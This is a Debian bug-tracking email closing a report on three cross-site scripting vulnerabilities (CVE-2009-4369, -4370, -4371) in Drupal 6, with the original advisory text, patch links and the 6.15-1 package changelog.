Your message dated Mon, 11 Jan 2010 21:36:31 +0000
with message-id <e1nurw7-0000b4...@ries.debian.org>
and subject line Bug#562165: fixed in drupal6 6.15-1
has caused the Debian Bug report #562165,
regarding CVE-2009-4369, CVE-2009-4370, CVE-2009-4371: Several XSS issues
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
562165: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=562165
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: drupal6
Severity: grave
Tags: security patch
Hi Luigi,
the following CVE (Common Vulnerabilities & Exposures) ids were
published for drupal6.
CVE-2009-4371[0]:
| Cross-site scripting (XSS) vulnerability in the Locale module
| (modules/locale/locale.module) in Drupal Core 6.14, and possibly other
| versions including 6.15, allows remote authenticated users with
| "administer languages" permissions to inject arbitrary web script or
| HTML via the (1) Language name in English or (2) Native language name
| fields in the Custom language form.
CVE-2009-4370[1]:
| Cross-site scripting (XSS) vulnerability in the Menu module
| (modules/menu/menu.admin.inc) in Drupal Core 6.x before 6.15 allows
| remote authenticated users with permissions to create new menus to
| inject arbitrary web script or HTML via a menu description, which is
| not properly handled in the menu administration overview.
CVE-2009-4369[2]:
| Cross-site scripting (XSS) vulnerability in the Contact module
| (modules/contact/contact.admin.inc or modules/contact/contact.module)
| in Drupal Core 5.x before 5.21 and 6.x before 6.15 allows remote
| authenticated users with "administer site-wide contact form"
| permissions to inject arbitrary web script or HTML via the contact
| category name.
If you fix the vulnerabilities please also make sure to include the
CVE ids in your changelog entry.
For the latter two you can find the upstream patch here[3]. The former
issue has the patch here[4].
For lenny, please coordinate with the stable release team and go via
stable-proposed-updates as these issues do not seem to warrant a DSA.
Cheers
Steffen
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4371
http://security-tracker.debian.org/tracker/CVE-2009-4371
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4370
http://security-tracker.debian.org/tracker/CVE-2009-4370
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4369
http://security-tracker.debian.org/tracker/CVE-2009-4369
[3] http://drupal.org/files/sa-core-2009-009/SA-CORE-2009-009-6.14.patch
[4] http://www.madirish.net/?article=442
--- End Message ---
--- Begin Message ---
Source: drupal6
Source-Version: 6.15-1
We believe that the bug you reported is fixed in the latest version of
drupal6, which is due to be installed in the Debian FTP archive:
drupal6_6.15-1.diff.gz
to main/d/drupal6/drupal6_6.15-1.diff.gz
drupal6_6.15-1.dsc
to main/d/drupal6/drupal6_6.15-1.dsc
drupal6_6.15-1_all.deb
to main/d/drupal6/drupal6_6.15-1_all.deb
drupal6_6.15.orig.tar.gz
to main/d/drupal6/drupal6_6.15.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 562...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Luigi Gangitano <lu...@debian.org> (supplier of updated drupal6 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Mon, 11 Jan 2010 19:47:13 +0100
Source: drupal6
Binary: drupal6
Architecture: source all
Version: 6.15-1
Distribution: unstable
Urgency: low
Maintainer: Luigi Gangitano <lu...@debian.org>
Changed-By: Luigi Gangitano <lu...@debian.org>
Description:
drupal6 - a fully-featured content management framework
Closes: 561726 562165
Changes:
drupal6 (6.15-1) unstable; urgency=low
.
* New upstream release (Closes: #561726)
- Fixes several XSS vulnerabilities (Closes: #562165)
(Ref: SA-CORE-2009-009, CVE-2009-4369, CVE-2009-4370, CVE-2009-4371)
.
* debian/rules
- Use dh_prep instead of dh_clean -k
.
* debian/control
- Upgraded versioned dependency on debhelper to 7
.
* debian/README.source
- Added directions on source handling
Checksums-Sha1:
2dd7821242bc6a972375d109babd253f45cddf2a 1113 drupal6_6.15-1.dsc
5be5ebf85c9ffa33e71c5a0f05d1308d3af19ab8 1085634 drupal6_6.15.orig.tar.gz
c178f2447fb53415659efbdeaf8c66b2e24fcdcf 16812 drupal6_6.15-1.diff.gz
1eb147ba1b2dca112fca2a879e85a88e8a840c73 1117888 drupal6_6.15-1_all.deb
Checksums-Sha256:
0cbd2dc00e7adcc3a8e4f915ab020daba96fa5168e77419783606245d662ad46 1113
drupal6_6.15-1.dsc
eff5f840ebc104698846e9a1b3977829ca65c8a4ff892f4656790584225bf9a1 1085634
drupal6_6.15.orig.tar.gz
4f5feffe27958946eb4fde05be42c04b87d6c8abea2d7352d17ed74df8dc0d60 16812
drupal6_6.15-1.diff.gz
379022c41b47dfd29b0d98facbb502090551e5369939c68e2224c9472032d4c5 1117888
drupal6_6.15-1_all.deb
Files:
28196e7b433e501ebca8d8c92cd608be 1113 web extra drupal6_6.15-1.dsc
43c60bde08d6ea67682a998c2804c357 1085634 web extra drupal6_6.15.orig.tar.gz
d782866c274d778c8572582fa220187b 16812 web extra drupal6_6.15-1.diff.gz
bd4b14120e4795f37bcef2e69197d5e0 1117888 web extra drupal6_6.15-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAktLkuIACgkQ8ZumGJJMDCYekgCdGRgT4zWCSqVJF8ew/o54325D
xDQAnjcuooZ1piQpQBCKMgnNQ0eFxYhD
=0S4x
-----END PGP SIGNATURE-----
--- End Message ---
